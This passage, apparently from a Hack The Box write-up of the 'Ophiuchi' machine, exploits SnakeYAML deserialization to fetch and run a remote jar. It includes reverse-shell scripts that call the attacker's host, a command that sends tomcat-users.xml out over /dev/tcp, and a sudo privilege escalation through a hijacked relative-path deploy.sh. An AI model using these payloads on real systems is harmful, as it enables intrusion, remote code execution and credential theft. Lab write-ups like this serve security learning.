class="SemanticString">Enter the following in the parser:</span></span><pre id="https://www.notion.so/d504cbc03171471c88be2da31e37188b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token tag">!!javax.script.ScriptEngineManager</span> <span class="token punctuation">[</span>
<span class="token tag">!!java.net.URLClassLoader</span> <span class="token punctuation">[</span><span class="token punctuation">[</span>
<span class="token tag">!!java.net.URL</span> <span class="token punctuation">[</span><span class="token string">"http://10.10.14.103:8000/owata.html"</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/229193c426d14ebc81d08f0a95c41a48" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This payload should make SnakeYAML invoke the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ScriptEngineManager</code></span><span class="SemanticString"> constructor and make a GET request to our HTTP server.</span></span></li><li id="https://www.notion.so/c8ed3043e18947788fca5232c268dd66" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Upon clicking parse, we get a GET request from the victim, confirming that the parser is indeed still active and deserialising data:</span></span><pre id="https://www.notion.so/e6a9635186d64245bc5e90c7fd9da9da" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.227 <span class="token punctuation">-</span> <span class="token punctuation">-</span> <span class="token punctuation">[</span>07/Mar/2021 21<span class="token punctuation">:</span><span class="token datetime number">14:02</span><span class="token punctuation">]</span> "GET /owata.html HTTP/1.1" 302 <span class="token punctuation">-</span>
10.10.10.227 <span class="token punctuation">-</span> <span class="token punctuation">-</span> <span class="token punctuation">[</span>07/Mar/2021 21<span class="token punctuation">:</span><span class="token datetime number">14:02</span><span class="token punctuation">]</span> "GET / HTTP/1.1" 200 <span class="token punctuation">-</span></span></span></span></code></pre></li><li id="https://www.notion.so/dc50d009bafe479c8bc4c27c18421833" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using a Java template file by </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/artsploit/yaml-payload">artsploit</a></span><span class="SemanticString">, let's try to make SnakeYAML execute a reverse shell.</span></span></li><li id="https://www.notion.so/4a9f5683c73d41dc90f08af1f28c1ca7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">rev.sh</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/bae395af86e24b63b5a8f96bcdc512f8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/sh</span>
<span class="token function">bash</span> <span class="token parameter variable">-i</span> <span class="token operator">>&</span> /dev/tcp/10.10.14.103/4444 <span class="token operator"><span class="token file-descriptor important">0</span>></span><span class="token file-descriptor important">&1</span></span></span></span></code></pre></li><li id="https://www.notion.so/28c420edb7e9476d8248a948d3088885" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">AwesomeScriptEngineFactory.java</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/ac3503555c3d40cabc2107f2faf7dd14" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token keyword">public</span> <span class="token class-name">AwesomeScriptEngineFactory</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"curl http://10.10.14.103:8000/rev.sh -o /dev/shm/rev.sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"chmod +x /dev/shm/rev.sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"bash /dev/shm/rev.sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">IOException</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span></span></span></span></code></pre></li><li id="https://www.notion.so/a3815ca0f9304eafa99356076c8975be" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Compile the Java payload and place the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.jar</code></span><span class="SemanticString"> file in the directory served by our HTTP server:</span></span><div id="https://www.notion.so/c58198b1a67a48329ade6e2d7322d9e2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ javac ./yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java</code></span></span></p></div><div id="https://www.notion.so/3737c28d468d4395abbe5b0816b558c5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ jar -cvf yaml-payload.jar -C ./yaml-payload/src/ .</code></span></span></p></div><div id="https://www.notion.so/2752795fee984edc8936b84b430d363a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mv yaml-payload.jar ./www</code></span></span></p></div></li><li id="https://www.notion.so/7602659137524fc0becf3e5643ba93cc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for the reverse shell on port 4444:</span></span><div id="https://www.notion.so/c61207e52a4d4ade9cd355999b3ea0ca" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code 
class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4444</code></span></span></p></div></li><li id="https://www.notion.so/6371b153c1474440baf764ae1b63c5ef" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make SnakeYAML perform a GET request on our .jar payload:</span></span><pre id="https://www.notion.so/b2ab52548a3d4ffd8a888569f167e0ce" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token tag">!!javax.script.ScriptEngineManager</span> <span class="token punctuation">[</span>
<span class="token tag">!!java.net.URLClassLoader</span> <span class="token punctuation">[</span><span class="token punctuation">[</span>
<span class="token tag">!!java.net.URL</span> <span class="token punctuation">[</span><span class="token string">"http://10.10.14.103:8000/yaml-payload.jar"</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/11d4131fc0df4394bdbdf0b52e872322" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Getting Java errors:</span></span><pre id="https://www.notion.so/dbeb14508919448c861d6b4d8710e70a" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token key atrule">java.lang.UnsupportedClassVersionError</span><span class="token punctuation">:</span> artsploit/AwesomeScriptEngineFactory has been compiled by a more recent version of the Java Runtime (class file version 58.0)<span class="token punctuation">,</span> this version of the Java Runtime only recognizes class file versions up to 55.0</span></span></span></code></pre></li><li id="https://www.notion.so/67ae47d6690044198459d33aa271a33f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">It looks like </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">javac</code></span><span class="SemanticString"> compiled the class for a Java runtime newer than the target's (Java 14, class file version 58.0). Let's target Java 11 (class file version 55.0) and recompile:</span></span><div id="https://www.notion.so/2fa5e177263b4d4192a9dead9884a2c2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ javac ./yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java --source 11 --target 11</code></span></span></p></div><div id="https://www.notion.so/8c546d2768524fdbbbcdbdbf893b5a40" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ jar -cvf yaml-payload.jar -C 
./yaml-payload/src/ . && mv yaml-payload.jar ./www</code></span></span></p></div></li><li id="https://www.notion.so/e9835130c84f4fdc8c9fa6b62b07ec98" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Resend the payload, and we should get a reverse shell as tomcat:</span></span><div id="https://www.notion.so/18d40226c0c44603900cc779aa3d5681" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/5ebb65e35f104819b8afd40acc21f388" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>tomcat
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)</span></span></span></code></pre></li><li id="https://www.notion.so/2d2d803fe4dd43e894d25ea51d1585dc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's go look for the credential file for the manager application, set up a listener locally and transfer the file through </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/b0495abd2d954e9fa377eecd0249fdec" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 1337 > tomcat-users.xml</code></span></span></p></div><div id="https://www.notion.so/1170196583084587973854399e70aea8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /opt/tomcat/conf/tomcat-users.xml > /dev/tcp/10.10.14.103/1337</code></span></span></p></div></li><li id="https://www.notion.so/45bf00a696924da09c0c54fb51d25753" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">tomcat-users.xml</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/265b2eb45689408d8fdef87bdc996d24" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>user</span> <span class="token attr-name">username</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>admin<span 
class="token punctuation">"</span></span> <span class="token attr-name">password</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>whythereisalimit<span class="token punctuation">"</span></span> <span class="token attr-name">roles</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>manager-gui,admin-gui<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/c7bb82a461e34a70ae457381e080fa04" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found manager credentials:</span></span><div id="https://www.notion.so/5cb4c99412d040f2b178339eb7b74f87" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">admin:whythereisalimit</code></span></span></p></div></li><li id="https://www.notion.so/71a798059ab04a5182460237a23f10b0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigating to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/home</code></span><span class="SemanticString"> directory, we find an "admin" user.</span></span></li><li id="https://www.notion.so/110c10a3de3b473d8fa4232ad4c80dd1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Attempt to switch user to "admin":</span></span><div id="https://www.notion.so/f6fa31fdd0434b5c8a6cc0729ea8227d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su 
admin</code></span></span></p></div><div id="https://www.notion.so/fbaaf0363d9d4f689610cf7a2bf3dac2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Password: whythereisalimit</code></span></span></p></div></li><li id="https://www.notion.so/399c8754b28d43c6b8a30d07131bf4cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The terminal seems to hang at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">su</code></span><span class="SemanticString"> because our reverse shell has no pty, so let's upgrade it by spawning one:</span></span><div id="https://www.notion.so/33b40c9a4e934535a7202022602c8ba4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "import pty; pty.spawn('/bin/bash')" > /dev/shm/shell.py</code></span></span></p></div><div id="https://www.notion.so/cf24d0ac69464dbcb719c5d137434f07" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 /dev/shm/shell.py</code></span></span></p></div></li><li id="https://www.notion.so/4ce98514703d4eedaa70c19e6cbf00a3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Retry, and we should get a shell as "admin":</span></span><div id="https://www.notion.so/a7f0c72ab11643a3a209bd87335c4210" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && 
id</code></span></span></p></div><pre id="https://www.notion.so/e15f31ebde26411b8fdfb67c05963e17" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>admin
uid=1000(admin) gid=1000(admin) groups=1000(admin)</span></span></span></code></pre></li><li id="https://www.notion.so/1a8fc3c949fc4b93ac214971aae27bd8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Alternatively, it is also possible to simply SSH into the victim as "admin"; this gives us a stable interactive shell with tab completion etc.</span></span></li><li id="https://www.notion.so/330c0cf1847844d3967ca9db4baf9b76" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/23ba62d0116a4014b0cf211df605c0fb" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/23ba62d0116a4014b0cf211df605c0fb"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/643c2141e0f6434b91225445f0832267" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using the credentials, log in to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://ophiuchi.htb:8080/manager">http://ophiuchi.htb:8080/manager</a></span><span class="SemanticString">, and we arrive at an application manager panel:</span></span><div id="https://www.notion.so/a70350d98f4b4f5db81b7492f1268124" class="Image Image--Normal"><figure><a href="https://i.imgur.com/EzTrnUy.png?width=1008"><img 
src="https://i.imgur.com/EzTrnUy.png?width=1008" style="width:1008px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/396c71fa09cd4d369d70a3350a2c30a1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looking through the different applications, it seems we can upload WAR files to be deployed, but it doesn't seem helpful for escalating privileges because we already have code execution as tomcat.</span></span></li><li id="https://www.notion.so/57f110f72f1e45cfb196de7a7db13717" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking sudo privileges on admin user:</span></span><div id="https://www.notion.so/9e22e632fe0748b19cf82040909ba80c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo -l</code></span></span></p></div><pre id="https://www.notion.so/8eb6035cc64d4aadb6142ce361afeb77" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go</span></span></span></code></pre></li><li id="https://www.notion.so/678fff1270fe49afa3e432b82ec48e73" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">It seems the admin user can run </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/usr/bin/go</code></span><span class="SemanticString"> as root, but only on the specific </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString"> file in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/opt/wasm-functions</code></span><span class="SemanticString">. Let's download the entire directory to take a better look:</span></span><div id="https://www.notion.so/eb9e48c191fd46e9b5e859cee88b7f0b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ scp -r [email protected]:/opt/wasm-functions .</code></span></span></p></div><pre id="https://www.notion.so/cde695f489304cd0b79a0d2919cac447" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>index 100% 2458KB 4.9MB/s 00:00
index.go 100% 522 19.3KB/s 00:00
deploy.sh 100% 88 3.3KB/s 00:00
main.wasm 100% 1445KB 5.6MB/s 00:00
index.go 100% 522 18.7KB/s 00:00
deploy.sh 100% 88 3.2KB/s 00:00
main.wasm 100% 1445KB 5.6MB/s 00:00</span></span></span></code></pre></li><li id="https://www.notion.so/ce8578408184430a838752d54f311d7b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/c7de8aa218364628bd8ab9f2f6064733" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>package main
import (
"fmt"
wasm "github.com/wasmerio/wasmer-go/wasmer"
"os/exec"
"log"
)
func main() {
bytes, _ := wasm.ReadBytes("main.wasm")
instance, _ := wasm.NewInstance(bytes)
defer instance.Close()
init := instance.Exports["info"]
result,_ := init()
f := result.String()
if (f != "1") {
fmt.Println("Not ready to deploy")
} else {
fmt.Println("Ready to deploy")
out, err := exec.Command("/bin/sh", "deploy.sh").Output()
if err != nil {
log.Fatal(err)
}
fmt.Println(string(out))
}
}</span></span></span></code></pre></li><li id="https://www.notion.so/6bd121a7501a42d996726fa14d6fe50d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We also see a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">deploy.sh</code></span><span class="SemanticString"> script in the same directory, but it contains nothing except comments:</span></span><pre id="https://www.notion.so/deac800b3a9f4744a43659d88a7d3b21" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token comment"># ToDo</span>
<span class="token comment"># Create script to automatic deploy our new web at tomcat port 8080</span></span></span></span></code></pre></li><li id="https://www.notion.so/2483ddc3228e48c493cfa4890a2e8922" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">There is also a WebAssembly binary called </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/53d6d4c9f3be453b859c6b02bdc8d191" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ file main.wasm</code></span></span></p></div><pre id="https://www.notion.so/12600aea7251452ba5c23eddce535b95" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>main.wasm: WebAssembly (wasm) binary module version 0x1 (MVP)</span></span></span></code></pre></li><li id="https://www.notion.so/1b7c70173d684b35b3dd54424281e43b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Executing </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString"> with sudo returns:</span></span><div id="https://www.notion.so/cb65030554824f4a8a2a6e7a2abdb565" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo /usr/bin/go run /opt/wasm-functions/index.go</code></span></span></p></div><pre id="https://www.notion.so/f3d2ab1bee7541cf87ecbadd50f07ef3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Not ready to 
deploy</span></span></span></code></pre></li><li id="https://www.notion.so/59f1e47c7e1f4b098a31a6f0591f4fe7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString"> script also loads </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">deploy.sh</code></span><span class="SemanticString"> by relative path rather than absolute path, so whichever files sit in the current working directory when we run the sudo command are the ones that get used.</span></span></li><li id="https://www.notion.so/4067467a420d49d3bd1777b9ec927ec1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The script executes </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">deploy.sh</code></span><span class="SemanticString"> with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/sh</code></span><span class="SemanticString"> only if the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">info</code></span><span class="SemanticString"> function in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> returns exactly </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">1</code></span><span class="SemanticString">, so making it return that value is our goal.</span></span></li><li id="https://www.notion.so/3fee7b93d6e54009aaeaf8c0dfb61608" class="BulletedList"><span 
class="SemanticStringArray"><span class="SemanticString">Otherwise, it prints "Not ready to deploy" and exits.</span></span></li><li id="https://www.notion.so/f33919c84a29496e9d3745cb7dfb4276" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's begin by creating a deploy.sh file in our temporary working directory:</span></span><div id="https://www.notion.so/e692cad4357945efb48f6ec6a7b91103" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.103/4444 0>&1'" > /dev/shm/deploy.sh</code></span></span></p></div></li><li id="https://www.notion.so/61c2da309c2443ee91a1f1bfdf24f9fe" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Since this script will be executed by </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/sh</code></span><span class="SemanticString"> and not </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/bash</code></span><span class="SemanticString">, we wrap the payload in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/bash -c</code></span><span class="SemanticString"> so that the bash-only redirection syntax works.</span></span></li><li id="https://www.notion.so/61832a789ed74b15a44b81cdc2fc5a66" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wasm2wat</code></span><span class="SemanticString">, disassemble the </span><span class="SemanticString"><code class="SemanticString__Fragment 
SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> binary into a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.wat</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/d45c860744de49618054866c3ca4f28c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wasm2wat main.wasm > main.wat</code></span></span></p></div></li><li id="https://www.notion.so/bc7440ea2e3644bbb88378c32b950fc2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wat</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/148b71bb49284b98823cb927f019aab8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">(</span><span class="token keyword">module</span>
<span class="token punctuation">(</span><span class="token keyword">type</span> <span class="token variable">$t0</span> <span class="token punctuation">(</span><span class="token keyword">func</span> <span class="token punctuation">(</span><span class="token keyword">result</span> <span class="token keyword">i32</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">func</span> <span class="token variable">$info</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"info"</span><span class="token punctuation">)</span> <span class="token punctuation">(</span><span class="token keyword">type</span> <span class="token variable">$t0</span><span class="token punctuation">)</span> <span class="token punctuation">(</span><span class="token keyword">result</span> <span class="token keyword">i32</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">table</span> <span class="token variable">$T0</span> <span class="token number">1</span> <span class="token number">1</span> funcref<span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">memory</span> $<span class="token keyword">memory</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"memory"</span><span class="token punctuation">)</span> <span class="token number">16</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">global</span> <span class="token variable">$g0</span> <span class="token punctuation">(</span><span class="token keyword">mut</span> <span class="token keyword">i32</span><span class="token punctuation">)</span> <span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">1048576</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">global</span> <span class="token variable">$__data_end</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"__data_end"</span><span class="token punctuation">)</span> <span class="token keyword">i32</span> <span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">1048576</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">global</span> <span class="token variable">$__heap_base</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"__heap_base"</span><span class="token punctuation">)</span> <span class="token keyword">i32</span> <span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">1048576</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/6daacf5287354f2fad40c9305d8c9db0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Change the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">i32</code></span><span class="SemanticString"> line under function </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$info</code></span><span class="SemanticString"> from a 0 to a 1:</span></span><div id="https://www.notion.so/6020c6acb17440f9b95416ceed842f09" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">(i32.const 0))</code></span><span class="SemanticString"> → </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">(i32.const 